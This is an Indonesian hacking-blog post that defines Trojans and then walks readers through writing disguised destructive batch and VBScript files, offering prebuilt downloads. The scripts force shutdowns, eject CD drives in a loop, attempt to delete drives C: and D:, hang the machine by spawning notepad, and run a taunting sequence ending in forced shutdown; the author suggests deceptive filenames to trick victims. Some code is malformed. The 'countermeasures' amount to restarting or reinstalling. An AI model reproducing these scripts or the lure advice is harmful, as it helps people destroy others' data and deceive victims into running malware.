Pemblokir Iklan Terdeteksi

Matikan adBlock anda untuk dapat mengakses situs ini.

translate to english

Virus Trojan - Pengertian dan cara membuatnya serta cara mengatasinya

 

Virus Trojan W4FXploit

Halo 

siapa nih yang ngalamin perangkat nya terjangkit virus Trojan ? wah gimana rasanya

sama kek admin juga dulu pernah smartphone admin terjangkit virus Trojan

ya begitulah panik karena waktu itu masih belum tau apa apa

maka kalian yang belum tau mengenai virus Trojan tepat sekali ni membaca artikel ini

karena disini akan di bahas mengenai Virus Trojan mulai dari Pengertian ,  cara kerja dan Cara membuat nya serta cara menangkal nya

Pengertian


Trojan horse atau biasa disebut Trojan dalam keamanan komputer merujuk kepada sebuah perangkat lunak berbahaya yang dapat merusak sebuah sistem atau jaringan. Tujuan dari Trojan adalah memperoleh informasi dari target (password, kebiasaan user yang tercatat dalam system log, data, dan lain-lain), dan mengendalikan target (memperoleh hak akses pada target)

Cara Kerja Virus Trojan

Nah jika sudah membaca pengertian virus Trojan maka selanjutnya mengenai cara kerja virus ini
nah kalian pasti bertanya tanya gimana sih kok bisa virus Trojan ini bekerja 
nah virus Trojan ini di rancang menjadi transparan atau bahkan terlihat sama sekali tidak berbahaya untuk mengelabuhi korban

Trojan umumnya menyamar menjadi aplikasi software premium yang didapat gratis, Vidio, gambar,anti virus palsu, ataupun file file lainya

banyak yang mengatakan bahwa Trojan ini virus padahal berbeda

lah darimananya yang berbeda ?

virus memiliki kemampuan mengeksekusi dan melakukan cloning dirinya sendiri sementara Trojan tidak dapat melakukannya... ya meskipun keduanya sama sama memiliki arti program jahat yang dapat merusak namun jika diperdalam lagi maka akan berbeda. virus Trojan memerlukan korban untuk mengeksekusi maka dari itulah fungsi Trojan di desain memanipulasi supaya tak terlihat dan terlihat tak berbahaya

ketika korban menjalankan atau mengklik aplikasi atau sesuatu yang berisi trojan maka Trojan tersebut baru akan mengeksekusi dan merusak perangkat korban dan mencuri data data 


Cara Membuat Virus Trojan

Nah sekarang saatnya pembuatan Trojan ini serta akan admin kasih cara menangkalnya

pertama adalah kalian buka notepad atau code editor atau sejenisnya untuk membuat file karena ini dengan cara mengetik an kode lalu di save dengan eksistensi yang tertera




1.Shutdown atau mematikan perangkat komputer

nah cara kerja nya yang pertama adalah mematikan komputer saat menjalankan program nya

kode
@echo shutdown -s -t 3 -f
lalu save dengan ext .bat misal virus.bat 
nah untuk mengelabuhi korban tulis saja nama file nya seperti sadapwa.bat atau sejenisnya

cara mengatasi nya adalah restart komputer lalu tidak mengklik atau menjalankan file tersebut


2.Buka Tutup CdRom

Nah siapa sih yang ga sebel ketika hardware tiba tiba berjalan tak sesuai rencana
nah kode Trojan ini membuat fitnah kepada setan disekitarnya karena cdrom akan terbuka dan tertutup sendiri nah untuk kodenya adalah
Set oWMP = CreateObject("WMPlayer.OCX.7")

Set colCDROMs = oWMP.cdromCollection

do

if colCDROMs.Count >= 1 then

For i = 0 to colCDROMs.Count - 1

colCDROMs.Item(i).Eject

NextFor i = 0 to colCDROMs.Count - 1

colCDROMs.Item(i).Eject

Next

End If

wscript.sleep 5000

loop

Save dengan eksistensi .vbs
cara mengatasi nya sama seperti yang di awal
restart dan jangan buka atau run program nya

3.Menghapus Data di local disk C dan D

wah siapa lagi nih yang pinjem in laptop atau komputer kamu ke temen tapi tiba tiba file di localdisk c dan d kamu hilang ? wah mungkin kali ini kamu gabakal fitnah setan lagi deh... melainkan kamu akan memfitnah temen kamu yang barusan pinjem laptop atau komputer kamu... gaboleh loh ya bisa jadi ini karena teman kamu ga sengaja menjalankan atau mengklik program yang terdapat Trojan dengan kode ini
DEL @echo off

DEL C: -Y

DEL D: -Y

Simpan dengan eksistensi .bat untuk cara mengatasi nya adalah menginstal ulang

4.Membuat Komputer/Laptop hang atau blank

aduh aduh panik gak seh ketika komputer atau laptop kalian tiba tiba hang ? ataupun blank ? jangan sangka ini karena Lcd nya yang rusak karena bisa jadi ulah Trojan ini lagi dan kode Trojan yang bisa membuat komputer atau laptop hank atau blank adalah

@ECHO off

:top START %SystemRoot%\system32\notepad.exe



cara kerjanya adalah membuka aplikasi notepad sampai komputer blank 
dan cara mengatasinya dengan restart dan hapus file yang berisi trojan

5. Mengacak-acak system Windows

waduh inimah yang paling mengerikan
mengacak-acak system bawaan windows yaitu memindah file yang bisa dipindah , menyebar lewat cmd dan sulit dipulihkan apabila sudah terjangkit

untuk kode nya adalah 

  
cls

:A

color 0a

cls

@echo off

echo Wscript.Sleep 5000>C:\sleep5000.vbs

echo Wscript.Sleep 3000>C:\sleep3000.vbs

echo Wscript.Sleep 4000>C:\sleep4000.vbs

echo Wscript.Sleep 2000>C:\sleep2000.vbs

cd %systemroot%\System32

dir

cls

start /w wscript.exe C:\sleep3000.vbs

echo BANGUN TIDUR KU TERUS MENGHANCURKAN SYSTEM…^__^echo …………………

echo:

echo:

start /w wscript.exe C:\sleep3000.vbs

echo NEXT…………!

echo:

echo:

echo HALO SOBAT

echo MAU JADI TEMAN AKU ??

echo:

echo:

echo Your system has ben attack by W4FXploit!!!

start /w wscript.exe C:\sleep2000.vbs

echo …………

start /w wscript.exe C:\sleep4000.vbs

echo …………

echo NTAR…….!

start /w wscript.exe C:\sleep2000.vbs

echo:

echo:

echo:

echo VIRUS INI ADALAH VIRUS YANG SANGAT MEMATIKAN tapi tak seperti dia mengkhianati ku…

cd C:\Documents and Settings\All Users\Start Menu\Programs\

mkdir Hack_W4FXploit_Done

start /w wscript.exe C:\sleep3000.vbs

echo:

echo:

echo:

echo:

echo HAPPY BIRTHDAY

echo KOMPUTER KAMU BAGUS DEH

echo BOLEH Q INTIP DIKIT

echo HMM BOLEH JUGA NEH ISINYA

echo My Site https://www.w4fxploit.my.id

echo:

echo:

echo:

echo:

echo:

echo SABARAN BRO…

start /w wscript.exe C:\sleep3000.vbs

echo ………..

echo zzzzzzz….

echo:

echo:

start /w wscript.exe C:\sleep3000.vbs

echo OKE….Virus AKTIF!

echo:

echo:

echo:

start /w wscript.exe C:\sleep2000.vbs

echo FIREWALL KAMU ANCUR…

start /w wscript.exe C:\sleep2000.vbs

echo SEMUA PROSESS UDAH DIBANTAI…

start /w wscript.exe C:\sleep2000.vbs

echo DENGAN SEGALA HORMAT VIRUS BOOTING DULU…

start /w wscript.exe C:\sleep2000.vbs

echo:

echo:

echo:

echo VIRUS MASUK PODIUM AKHIR!

start /w wscript.exe C:\sleep2000.vbs

echo:

echo:

echo I LOVE U FULL

echo HA HA HA HA

echo:

echo:

echo:

echo:

start /w wscript.exe C:\sleep2000.vbs

pause

shutdown -f -s -c “BERTAUBATLAH, BACK TO UR GOD MOHON MAAF LAHIR DAN BATIN

WASSALUMUALAIKUM WR WB.”

Simpan dengan eksistensi .bat

Nah untuk cara mengatasi nya 

INSTALL ULANG ONLY 

yup... sangat berbahaya hingga cara mengatasinya adalah hanya install ulang Operating sistem nya 






// Download //

nah buat kalian yang males buat file nya karena kendala yang termasuk ToS /kebijakan blog W4FXploit maka admin buatkan langsung jadi kamu bisa langsung download via MEDIAFIRE dan langsung gunakan deh


1.Shutdown


2.Open close CdRom


3.Delete Local disk C dan D


4.Membuat Laptop Blank


5.Mengacak-acak dan merusak System




Penutup


Akhir sudah diakhir artikel

semoga bermanfaat ini hanya pengetahuan loh ya... jika ada sebuah hal yang dapat merugikan pihak lain bukan tanggung jawab admin 🙃 dan berhati hati lah karena ancaman peretas ada dimana mana saat kita berada di dunia tekno atau dunia maya /IT 

jika ada kekurangan atau salah kata admin minta maaf dan sampai jumpa di artikel selanjutnya...





Posting Komentar

Berkomentar lah dengan sopan dan tidak spam, Dan Centang Kotak (beritahu saya) untuk mendapatkan Update mengenai komentar kamu
W4FXploiters Support
Silahkan beritahu apa yang bisa kami bantu dan kami akan menjawab pertanyaan Anda.
Halo, ada yang bisa kami bantu?
Kirim